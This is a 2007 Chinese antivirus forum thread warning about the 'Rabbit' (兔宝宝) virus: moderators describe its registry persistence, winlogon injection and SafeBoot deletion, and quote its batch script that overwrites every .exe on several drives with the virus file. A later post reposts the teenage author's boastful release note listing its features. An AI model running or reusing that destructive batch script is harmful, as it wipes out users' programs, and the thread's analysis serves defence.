微点交流论坛 - 反病毒 - （转贴）警惕恶性病毒“兔宝宝”！

» 游客: 注册 | 登录 | 帮助

微点交流论坛 » 反病毒 » （转贴）警惕恶性病毒“兔宝宝”！

1/2

反黑先锋
版主

RUNWAY

积分 2901
发帖 2857
注册 2006-6-17

#1 （转贴）警惕恶性病毒“兔宝宝”！

baohe “病毒运行后关闭Tiny的Activity Monitor、SSM、IceSword等窗口
msexch400.dll插入winlogon.exe进程且不能强制卸除

注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\分支添加启动项:
{4bf41072-b2b1-21c1-b5c1-0305f4155515} :
指向C:\WINDOWS\system32\JK.exe
并删除HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot

系统文件以外（包括非系统分区）的.exe文件均被替换为260K大小的病毒文件（文件名还是原来正常.exe的文件名），图标变为“兔宝宝”。即使是“卡巴斯基”或“瑞星”文件夹中的.exe也不例外。

Tiny用户，即使预先设置了相关文件保护规则，病毒依然可以突破Tiny的FD规则，将那些受Tiny保护的.exe文件替换成260K的病毒文件。这是第一次遇到可以突破Tiny 文件保护的病毒。
此毒在系统分区以外的分区中，只要发现一个DLL文件（如：abc.dll），病毒即刻创建一个同名的、260K的.exe（abc.exe），图标也是“兔宝宝”。

中招后，用户就别指望扫什么劳什子日志求助了。运行任何.exe（当然包括SRENG等），你只能见到一闪而过的命令提示符窗口（实际运行的是那个260K的病毒体）。 ”

希望大家警惕目前所有扫毒软件都还无法查杀微点主动防御拦截处理成功样本我已上报卡巴和微点。

RABBIT.EXE >
cmd /c C:\WINDOWS\system32\love.bat：
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"

C:\WINDOWS\SYSTEM32\JK.EXE
C:\WINDOWS\SYSTEM32\LOVERABBIT.EXE
C:\WINDOWS\SYSTEM32\RABBIT.EXE

[ Last edited by 反黑先锋 on 2007-4-9 at 21:05 ]

附件 1: sshot-119.png (2007-4-9 11:46, 6.22 K,下载次数： 62)

附件 2: sshot-120.png (2007-4-9 11:46, 27.51 K,下载次数： 34)

附件 3: sshot-121.png (2007-4-9 11:46, 20.69 K,下载次数： 47)

附件 4: sshot-122.png (2007-4-9 11:47, 20.58 K,下载次数： 50)

附件 5: sshot-123.png (2007-4-9 11:47, 22.56 K,下载次数： 58)

附件 6: sshot-124.png (2007-4-9 11:47, 20.29 K,下载次数： 54)

附件 7: sshot-125.png (2007-4-9 12:07, 21.46 K,下载次数： 32)

※ ※ ※ 本文纯属【反黑先锋】个人意见，与【微点交流论坛】立场无关※ ※ ※

荣先祥藏头诗《赞东方微点》
东风欣传好消息
方策独步世所稀
微妙玄机嵌主动
点睛灭毒堪神笔

2007-4-9 11:46

反黑先锋
版主

RUNWAY

积分 2901
发帖 2857
注册 2006-6-17

#2 放行love.bat

创建时间键名称原数据新数据创建者
2007-04-09 12:18:44 HKLM\SOFTWARE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{4BF41072-B2B1-21C1-B5C1-0305F4155515}\ STUBPATH C:\WINDOWS\SYSTEM32\JK.EXE C:\WINDOWS\SYSTEM32\LOVERABBIT.EXE

K.0

病毒把d: e: f: g: h:的所有exe文件做一个列表放到c:\windows\msconfig.inf
把C:\Program Files所有exe 做一个列表放到c:\windows\msconfig1.inf
然后分别用C:\WINDOWS\system32\Rabbit.exe 替换这些exe（正在运行的不替换）

msconfig1.inf和msconfig.inf虽然已经无害建议微点也一并清除。

※ ※ ※ 本文纯属【反黑先锋】个人意见，与【微点交流论坛】立场无关※ ※ ※

荣先祥藏头诗《赞东方微点》
东风欣传好消息
方策独步世所稀
微妙玄机嵌主动
点睛灭毒堪神笔

2007-4-9 12:35

微点专家
版主

Weizi

积分 11554
发帖 11458
注册 2006-8-27
来自贵阳

#3

反黑做事永远都是那么的用心

※ ※ ※ 本文纯属【微点专家】个人意见，与【微点交流论坛】立场无关※ ※ ※

做个性的自己

2007-4-9 13:44

2002lihong
新手上路

积分 4
发帖 4
注册 2007-3-2

#4

恶心病毒越来越多，还是用微点好。

※ ※ ※ 本文纯属【2002lihong】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-4-9 17:30

jaber
版主

使用与技巧区版主

积分 2861
发帖 2835
注册 2006-6-6

#5

每次你的速度总是那么快！啥时候你上个Q好不？

※ ※ ※ 本文纯属【jaber】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-4-9 18:29

反黑先锋
版主

RUNWAY

积分 2901
发帖 2857
注册 2006-6-17

2007-04-08 14:48 编写这个病毒的15岁作者正在网上公布他的“作品” 并留下了他的联系方式

“病毒下载地址：X
一直在学习，却发现自己真的很差，不想多说，还是为自己的兴趣和爱好而奋斗！

之所以要命名为Rabbit.exe，是因为我现在的恋人的外号叫“兔子”，哈哈，就这样吧！

去年10月左右发布第一个病毒：魔鬼爱好者。。。现在看来垃圾的不能在垃圾了（基本由批处理完成，烂

的要死！）
之后又发布一个全部由VB编写的魔鬼爱好者2新年版，好象是圣诞节的时候吧，具体时间不清楚了，现在

看来也很烂，基本没任何保护措施！

后来还发布了3个小工具，具体的大家搜我以前发的帖子吧！

前段时间又弄了一个baidu大盗，就是可以盗取baidu贴吧ID的木马，但想下，一没技术含量二没什么意思

，又不是魔兽木马，哈哈！所以就没发出来了，而且都不是生成器，只是一个木马体！

现在呢，又要发布我的新病毒了~废话就不多说了~简单介绍一下！没什么技术含量高手不要见笑！

运行后
将释放几个文件
然后病毒主体将插入WINLOGON。EXE系统关键进程！（算是核心了）
杀冰刃
U盘传播
QQ尾巴（暂时还没挂马！）
AutoRun.inf（老手法了）
修改注册表以便启动，注册表位置比较深！网上基本没有此注册位置的介绍，至于在哪，用监视工具就可

以清楚的看到了，呵呵！
另外替换除C盘外其他盘上的所有EXE文件！（C盘包括\Program Files目录也会被替换！）
破坏安全模式

基本就这些，其实没什么破坏力，当然除了替换，如果没有替换的话，基本没任何破坏力，只不过电脑速

度就要慢了一些了~呵呵！

插到WINLOGON。EXE进程中的DLL比较特殊！怎么说呢，如果冰刃侥幸没有被杀（被杀的可能是80%），那

么也无法将DLL从WINLOGON。EXE进程中卸载出来，反而冰刃会卡死！当然你直接把WINLOGON。EXE结束了

也可以，那么你电脑就去屎吧！哈哈！

差不多就这些了~~只做技术研究！切勿XXXXX....其实说了也没用，都是废话，呵呵!

我的QQ X
E-MAIL : X@163.com

看不爽的，看不惯的，请不要关！发贴是我自由，做什么也是我的自由，你们不爽，闪开！你们也管不着

！要骂别到这里骂爹骂娘，有本事自己把自己保护好！不要JJYY谢谢各位了！呵呵！！

另外病毒可能还有BUG，不过我自己测试全部OK，其他的就不知道了，呵呵，不管了！

WELCOME 支持我的顶一个！

呵呵
挑战？
HO MY GOD。。。SORRY
一小小病毒啊，我想不至于被抓OR被怎么样吧？呵呵
我只是发出来玩玩而已没别的意思啊！希望你们不要误会
不存在什么暴发不暴发的
一没技术二没鸡群
怎么暴发呢！？呵呵

还是有很多BUG的
我会再次修改的
不过2000的系统好象不支持，呵呵！

希望高手多指点一二

晕死
不会吧？怎么这么快就有回复了？
gest 兄不会真的报警了吧？
呵呵
我才15岁啊。。希望不要这么快进监狱，不过我想最多教育一下也就是了。。。不过看到gest 兄说报警了，我心还真的震了一下。。。"

"病毒我将停止更新...."

[ Last edited by 反黑先锋 on 2007-4-9 at 22:45 ]

※ ※ ※ 本文纯属【反黑先锋】个人意见，与【微点交流论坛】立场无关※ ※ ※

荣先祥藏头诗《赞东方微点》
东风欣传好消息
方策独步世所稀
微妙玄机嵌主动
点睛灭毒堪神笔

2007-4-9 20:30

wkwx
中级用户

新手上路

积分 341
发帖 341
注册 2005-12-4

#7

闲得骨头疼了

※ ※ ※ 本文纯属【wkwx】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-4-9 21:38

408983504
银牌会员

此用户已被禁言

积分 1271
发帖 1238
注册 2007-1-6
来自广东

#8

牛人啊!!!

※ ※ ※ 本文纯属【408983504】个人意见，与【微点交流论坛】立场无关※ ※ ※

三用户版续费真TM的便宜啊！

2007-4-9 21:42

jaber
版主

使用与技巧区版主

积分 2861
发帖 2835
注册 2006-6-6

#9

反黑给你看个帖子
http://bbs.gdut.edu.cn/NGPXBBS/con?B=Virus&F=M.1176173101.A

※ ※ ※ 本文纯属【jaber】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-4-9 21:50

反黑先锋
版主

RUNWAY

积分 2901
发帖 2857
注册 2006-6-17

#10

Quote:

Originally posted by jaber at 2007-4-9 21:50:
反黑给你看个帖子
http://bbs.gdut.edu.cn/NGPXBBS/con?B=Virus&F=M.1176173101.A

他微点版本是3月9日的！一个月前的

“其间出现一件意料不到的事，已退出的微点升级……之前已提过退出微点，微点的进程不会自动退出，可以手动结束。但没想到还会升级呀，当然是不让它升级啦。

忘了微点之前有一次升级是要重启的，没想到刚才“否”了后，还是顽强的继续升级，呼呼…… ”

牛原来微点退出还能升级。。自动升级的吧我以后试试

[ Last edited by 反黑先锋 on 2007-4-9 at 22:10 ]

※ ※ ※ 本文纯属【反黑先锋】个人意见，与【微点交流论坛】立场无关※ ※ ※

荣先祥藏头诗《赞东方微点》
东风欣传好消息
方策独步世所稀
微妙玄机嵌主动
点睛灭毒堪神笔

2007-4-9 22:02

1/2

论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏

[ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司福建东方微点信息安全有限责任公司闽ICP备05030815号